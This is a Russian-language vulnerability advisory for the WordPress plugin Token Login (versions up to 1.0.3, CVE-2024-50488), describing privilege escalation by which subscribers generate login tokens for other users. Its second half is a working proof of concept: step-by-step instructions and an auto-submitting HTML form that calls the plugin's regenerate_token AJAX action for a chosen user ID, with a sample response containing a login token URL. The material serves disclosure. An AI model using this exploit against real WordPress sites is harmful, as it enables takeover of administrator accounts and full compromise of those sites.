
Token Login <= 1.0.3 - Аутентифицированное (Subscriber+) повышение привилегий
Token Login <= 1.0.3 - Аутентифицированное (Подписчик+) повышение привилегий
Плагин Auto Login, использующий безопасный URL с токеном. Ограничение входа по ролям. Плагин для WordPress уязвим к повышению привилегий через захват учетной записи во всех версиях до 1.0.3 включительно. Это связано с тем, что плагин неправильно проверяет, имеет ли пользователь разрешение на генерацию токена входа для других пользователей. Это позволяет аутентифицированным злоумышленникам, имеющим доступ уровня подписчика и выше, входить в систему под другими пользователями, включая администраторов.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login
Войдите в систему и запустите эту HTML-форму. Измените URL на сайт WordPress, на котором вы авторизованы. Измените ID на пользователя, для которого хотите сгенерировать токен. Скопируйте URL, и вы сможете войти под ним.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tl_admin_ajax_action" />
<input type="hidden" name="method" value="regenerate_token" />
<input type="hidden" name="user_id" value="7" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Ответ
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}